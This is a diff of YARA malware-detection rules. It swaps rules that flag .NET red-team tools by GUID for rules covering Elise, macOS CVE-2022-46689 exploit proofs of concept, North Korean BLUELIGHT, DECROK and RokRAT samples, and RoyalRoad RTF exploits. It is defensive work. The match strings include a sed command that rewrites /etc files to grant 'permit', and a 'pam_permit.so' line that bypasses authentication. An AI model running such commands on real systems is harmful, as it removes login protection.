-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/mitchmoser/AtYourService"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4203-L4216"
+		description = "Detects Elise malware samples - fake Norton Security NavShExt.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8e4f4ec8-5d31-5990-8c14-861423571a79"
+		date = "2018-01-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/blu3_team/status/955971742329135105"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lotusblossom_elise.yar#L13-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c15c466ff048af2818cf9b59794786ba6d11f70d7dee5ef5ee5f050a9b547790"
+		logic_hash = "d43486db0d4263f91924da89f1922ad965ed91eadd07ae0705eecd371f31fa44"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6dc2a49d58dc568944fef8285ad7a03b772b9bdf1fe4bddff3f1ade3862eae79"
 
 	strings:
-		$typelibguid0lo = "bc72386f-8b4c-44de-99b7-b06a8de3ce3f" ascii wide
+		$s1 = "NavShExt.dll" fullword wide
+		$s2 = "Norton Security" fullword wide
+		$a1 = "donotbotherme" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and ( pe.imphash ( ) == "e9478ee4ebf085d1f14f64ba96ef082f" or ( 1 of ( $s* ) and $a1 ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lockless : FILE
+rule SIGNATURE_BASE_EXPL_HKTL_Macos_Switcharoo_CVE_2022_46689_Dec22 : CVE_2022_46689 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f9b31f57-d721-5b6c-be63-b8309cba788a"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/GhostPack/LockLess"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4218-L4231"
+		description = "Detects POCs that exploit privilege escalation vulnerability CVE-2022-46689 on macOS"
+		author = "Florian Roth (Nextron Systems)"
+		id = "25c551f7-48ae-5e71-b86e-68fb440262e5"
+		date = "2022-12-19"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_macos_switcharoo_dec22.yar#L2-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "57e09a929cc90c399068fb00ddd00c462df34d285d51273aedf27220a0647a38"
-		score = 75
+		logic_hash = "c2cbe12a01a38db522c49143c5168d3519ef974b4e6157cb251aa66707c69d78"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-46689, FILE"
+		hash1 = "64acd79a37b6f8443250dd33e95bd933ee39fc6d4f35ba6a987dae878d017386"
+		hash2 = "6c2ace75000de8a7e8786f28b1b41eed72816991a0961475c6800753bfe9278c"
+		hash3 = "6ce080b236ea3aa3b4c992d12af99445ab800abc709c6abbef852a9f0cf219b6"
+		hash4 = "83cc4d72686aedf5218f07e60e759b4849b368975b70352dbba6fac4e8cde72b"
+		hash5 = "a7b7fcfd609ff653d32c133417c0d3ffd9f581fb6de05ddbdead4d36cb6e3cc2"
+		hash6 = "b2a97edb0ddc30ecc1a0b0c0739820bbef787394b44ab997393475de2ebf7b60"
+		hash7 = "c7a64c6da5cf5046ae5c683d0264a32027110a2736b4c1b0df294e29a061a865"
+		hash8 = "d517cde0d45e6930336538c89b310d5d540a66c921bf6f6f9b952e721b2f6a11"
+		hash9 = "d53a559ea9131fe42eacf51431da3adde5a8fd5c2f3198f0d5451ef62ed33888"
 
 	strings:
-		$typelibguid0lo = "a91421cb-7909-4383-ba43-c2992bbbac22" ascii wide
+		$x1 = "vm_read_overwrite: KERN_SUCCESS:%d KERN_PROTECTION_FAILURE:%d other:%d" ascii fullword
+		$x2 = "Execting: %s (posix_spawn returned: %d)" ascii fullword
+		$x3 = "/usr/bin/sed -e \"s/rootok/permit/g\" /etc" ascii fullword
+		$x4 = "vm_unaligned_copy_switch_race" ascii fullword
+		$s1 = "RO mapping was modified" ascii fullword
+		$s2 = "Ran %d times in %ld seconds with no failure" ascii fullword
+		$opa1 = { 4c 89 ee 31 c9 41 b8 00 40 00 00 6a 01 41 5c 41 54 6a 03 58 }
+		$opa2 = { e8 ?? 01 00 00 48 8b 05 ?? 0? 00 00 8b 38 48 8b 13 44 8b 4b 14 48 83 ec 08 4c 89 ee 31 c9 }
+		$opa3 = { 48 89 45 c8 48 8d 43 08 48 89 45 d0 4c 8b 7d c8 4c 8b 6d d0 6a 64 41 5e 80 7b 60 00 }
+		$opb1 = { 55 48 89 e5 48 83 ec 60 48 8b 05 ?1 06 00 00 48 8b 00 48 89 45 f8 0f 28 05 ?b 07 00 00 48 8d 75 d0 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( filesize < 400KB and 1 of ( $x* ) ) or ( ( uint16( 0 ) == 0xfacf or ( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) ) and filesize < 400KB and 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Easynet : FILE
+rule SIGNATURE_BASE_EXPL_Macos_Switcharoo_Indicator_Dec22 : CVE_2022_46689 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8408a057-4910-5d7b-80bc-78df17c95bf7"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/TheWover/EasyNet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4233-L4248"
+		description = "Detects indicators found after exploitations of CVE-2022-46689"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5d9559a-c19c-5ddc-9d72-701986a9d7ac"
+		date = "2022-12-19"
+		modified = "2023-12-05"
+		reference = "https://github.com/zhuowei/MacDirtyCowDemo"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_macos_switcharoo_dec22.yar#L42-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "75f69a226391fc6da86c6995295addbefe0a7e1a9ff972f211174a845816061f"
-		score = 75
+		logic_hash = "9b9ea134fc4b3a7b15ae585ced2e12cbe1defc54bc6175282d6b7a2a0b65abd1"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-46689, FILE"
 
 	strings:
-		$typelibguid0lo = "3097d856-25c2-42c9-8d59-2cdad8e8ea12" ascii wide
-		$typelibguid1lo = "ba33f716-91e0-4cf7-b9bd-b4d558f9a173" ascii wide
-		$typelibguid2lo = "37d6dd3f-5457-4d8b-a2e1-c7b156b176e5" ascii wide
+		$x1 = "auth       sufficient     pam_permit.so" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and $x1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbyebear : FILE
+rule SIGNATURE_BASE_APT_PY_Bluelight_Loader : INKYSQUID
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4a7f2514-2519-5fd5-9d17-110a67f829e7"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/S3cur3Th1sSh1t/SharpByeBear"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4250-L4264"
+		description = "Python Loader used to execute the BLUELIGHT malware family."
+		author = "threatintel@volexity.com"
+		id = "f8da3e40-c3b0-5b7f-8ece-81874993d8cd"
+		date = "2021-06-22"
+		modified = "2023-12-05"
+		reference = "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_inkysquid.yar#L39-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f39d756b6e0b8f9037d862bdfa9b14fc2eeddf0eafad805892b8b02410f78c63"
+		logic_hash = "e7e18a6d648b1383706439ba923335ac4396f6b5d2a3dc8f30f63ded7df29eda"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "INKYSQUID"
+		hash1 = "80269413be6ad51b8b19631b2f5559c9572842e789bbce031babe6e879d2e120"
+		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
 
 	strings:
-		$typelibguid0lo = "a6b84e35-2112-4df2-a31b-50fde4458c5e" ascii wide
-		$typelibguid1lo = "3e82f538-6336-4fff-aeec-e774676205da" ascii wide
+		$s1 = "\"\".join(chr(ord(" ascii
+		$s2 = "import ctypes " ascii
+		$s3 = "ctypes.CFUNCTYPE(ctypes.c_int)" ascii
+		$s4 = "ctypes.memmove" ascii
+		$s5 = "python ended" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphide : FILE
+rule SIGNATURE_BASE_APT_MAL_Win_Decrok : INKYSQUID
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "928e00c1-549a-58f5-9e7e-982a4319691a"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/outflanknl/SharpHide"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4266-L4279"
+		description = "The DECROK malware family, which uses the victim's hostname to decrypt and execute an embedded payload."
+		author = "threatintel@volexity.com"
+		id = "dc83843d-fd2a-52f1-82e8-8e36b135a0c5"
+		date = "2021-06-23"
+		modified = "2023-12-05"
+		reference = "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_inkysquid.yar#L61-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "62264aafeafe98ce23e7c03ce75be750ab95d77d3523c0748bdcb2f50d0c04cb"
+		hash = "6a452d088d60113f623b852f33f8f9acf0d4197af29781f889613fed38f57855"
+		logic_hash = "47fa03e95ac17ba7195858cd63b1769e5d56ab8a5edf872b345989b767050b87"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "INKYSQUID"
+		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
 
 	strings:
-		$typelibguid0lo = "443d8cbf-899c-4c22-b4f6-b7ac202d4e37" ascii wide
+		$v1 = {C7 ?? ?? ?? 01 23 45 67 [2-20] C7 ?? ?? ?? 89 AB CD EF C7 ?? ?? ?? FE DC BA 98}
+		$av1 = "Select * From AntiVirusProduct" wide
+		$av2 = "root\\SecurityCenter2" wide
+		$funcformat = { 25 30 32 78 [0-10] 43 72 65 61 74 65 54 68 72 65 61 64 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsvc : FILE
+rule SIGNATURE_BASE_APT_NK_Scarcruft_RUBY_Shellcode_XOR_Routine : APT
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cbc1d7d4-f3b4-5d02-84ae-621398cb7b51"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/jnqpblc/SharpSvc"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4281-L4294"
+		description = "Detects Ruby ShellCode XOR routine used by ScarCruft APT group"
+		author = "S2WLAB_TALON_JACK2"
+		id = "c393f2db-8ade-5083-9cec-f62f23056f8b"
+		date = "2021-05-20"
+		modified = "2023-12-05"
+		reference = "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_inkysquid.yar#L104-L133"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cb91c4cd858a49f5cf437d3d1fb173afa7fe44442d41ea8533797007003c35d4"
+		logic_hash = "a97041a06729d639c22a4ee272cc96555345b692fc0da8b62e898891d02b23ea"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APT"
+		type = "APT"
+		version = "0.1"
 
 	strings:
-		$typelibguid0lo = "52856b03-5acd-45e0-828e-13ccb16942d1" ascii wide
+		$hex1 = {C1 C7 0D 40 F6 C7 01 74 ?? 81 F7}
+		$hex2 = {41 C1 C2 0D 41 8B C2 44 8B CA 41 8B CA 41 81 F2}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcrasheventlog : FILE
+rule SIGNATURE_BASE_APT_NK_Scarcruft_Evolved_ROKRAT : APT FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "85d31989-ad96-5005-a747-8a19a67fdd80"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/slyd0g/SharpCrashEventLog"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4296-L4309"
+		description = "Detects RokRAT malware used by ScarCruft APT group"
+		author = "S2WLAB_TALON_JACK2"
+		id = "53cabf41-0154-5372-b667-60d8a7cb9806"
+		date = "2021-07-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_inkysquid.yar#L135-L179"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f53cfa44168a3ed81370ebb61153b6fab521801ffef33ace23aa8ed3376688eb"
+		logic_hash = "01a2f410687c943d6c6e421ffacfe42f9e7b6afb82e43ba03a8d525e075a3a3c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APT, FILE"
+		type = "APT"
+		version = "0.1"
 
 	strings:
-		$typelibguid0lo = "98cb495f-4d47-4722-b08f-cefab2282b18" ascii wide
+		$AES_IV_KEY = {
+        C7 44 24 ?? 32 31 12 23
+        C7 44 24 ?? 34 45 56 67
+        C7 44 24 ?? 78 89 9A AB
+        C7 44 24 ?? 0C BD CE DF
+        C7 45 ?? 2B 7E A5 16
+        C7 45 ?? 28 AE D2 A6
+        C7 45 ?? AB F7 15 88
+        C7 45 ?? 09 CF 4F 3C
+        }
+		$url_deocde = {
+               80 E9 0F
+               80 F1 C8
+               88 48 ??
+               48 83 EA 01  }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnettojscript_Languagemodebreakout : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8c8cf79f-8e69-5293-b27a-1f8593061627"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/FuzzySecurity/DotNetToJScript-LanguageModeBreakout"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4311-L4324"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "db2fb24c-df99-5622-ac3d-d31c34481984"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L25-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "de83b8138f49fe6aced5d9ebe77104f780496630f35550fbf0244429a2cb4917"
-		score = 75
+		logic_hash = "ebd507d95c454562fa0b364072120b35b1bf8dd2be129a419d893f6708ab9cca"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "deadb33f-fa94-41b5-813d-e72d8677a0cf" ascii wide
+		$S1 = "48905d006c9c5b0000000000030101030a0a01085a5ab844eb7112ba7856341231"
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpermission : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d5027f51-f3ca-53cd-96d7-c355b5c2e6fa"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/mitchmoser/SharPermission"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4326-L4339"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "135024ae-9ecf-5691-95ca-96002e500fd5"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L42-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "061a7ba9fb838b59a96e480356309af0c4b02d3ba3f2e83944c8dd98b739f6b6"
-		score = 75
+		logic_hash = "e252868042e5150d99de2c2f4642f3d91d764d5a062f3a8de9ab316e299e00ac"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "84d2b661-3267-49c8-9f51-8f72f21aea47" ascii wide
+		$S1 = "653037396132353234666136336135356662636665" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Registrystrikesback : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern3 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1577ed24-0e17-54f9-bc29-bb209acf9645"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/mdsecactivebreach/RegistryStrikesBack"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4341-L4354"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "7bce2fe6-a921-51ec-8b5f-5d7f55ab3864"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L59-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1e2aa9ddf6cbf35cb636e35c18159468ec98eb2c30078c2a1a2a635d14599959"
-		score = 75
+		logic_hash = "3b5d9872eb86d1a220e5b70c560e7054bee8b2bc1fa2a75781d87616674e2927"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "90ebd469-d780-4431-9bd8-014b00057665" ascii wide
+		$S1 = "4746424151515151505050500000000000584242eb0642424235353336204460606060606060606061616161616161616161616161616161"
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Clonevault : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern4Ab : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3340a095-d926-5c85-b7ed-03151712538d"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/mdsecactivebreach/CloneVault"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4356-L4369"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "b4926888-b576-59f7-932a-03b9326845da"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L77-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "830802635e6fc9e364ec574bc9f04b062100c46bfbed7029f437c0392ce983bc"
-		score = 75
+		logic_hash = "dd9468b3208a27b6f3b56037013f06c4d2adbd201a12df141bc980ad595a75c0"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "0a344f52-6780-4d10-9a4a-cb9439f9d3de" ascii wide
+		$S1 = "4746424151515151505050500000000000584242EB064242423535333620446060606060606060606161616161616}1616161616161616161" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Donut : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern4Ce : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "564dfd0a-af9b-505f-a6f0-de2a5c5c63f3"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/TheWover/donut"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4371-L4387"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "c6e8a072-23cd-5f6a-9b4f-57d3e4500d13"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L94-L109"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aae1ca872f60ddc6919938e55d98d27bf88fb382e8d47c06cfc3d3e795ce9f2a"
-		score = 75
+		logic_hash = "7033c5874b406341a68f761b45fd6a9b73a9875c80b14d52a7c2240202c8fb40"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "98ca74c7-a074-434d-9772-75896e73ceaa" ascii wide
-		$typelibguid1lo = "3c9a6b88-bed2-4ba8-964c-77ec29bf1846" ascii wide
-		$typelibguid2lo = "4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2" ascii wide
-		$typelibguid3lo = "361c69f5-7885-4931-949a-b91eeab170e3" ascii wide
+		$S1 = "584242eb064242423535333620446060606060606060606161616161616161616161616}1616161" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphandler : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern4D : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b71198a9-4d00-5d75-bc36-7c40655c84a3"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/jfmaes/SharpHandler"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4389-L4403"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "1677dfb4-7611-5bef-87d1-4cec6285791f"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L113-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3aee0d00306603786fdcf828dc2b1a2faed6c8e651b56eb1985c1b640966da20"
-		score = 75
+		logic_hash = "9b531063d2a5ae36ae4e708a749dcf2cdc4c85fc43769a8525049e6facfca674"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "46e39aed-0cff-47c6-8a63-6826f147d7bd" ascii wide
-		$typelibguid1lo = "11dc83c6-8186-4887-b228-9dc4fd281a23" ascii wide
+		$S1 = "584242eb06424242353533362044606060606060606060616161616161616161616}16161616161" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Driver_Template : FILE
+rule SIGNATURE_BASE_Royalroad_RTF : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "539f88c5-e779-55e0-98df-299a9068de9b"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/FuzzySecurity/Driver-Template"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4405-L4418"
+		description = "Detects RoyalRoad weaponized RTF documents"
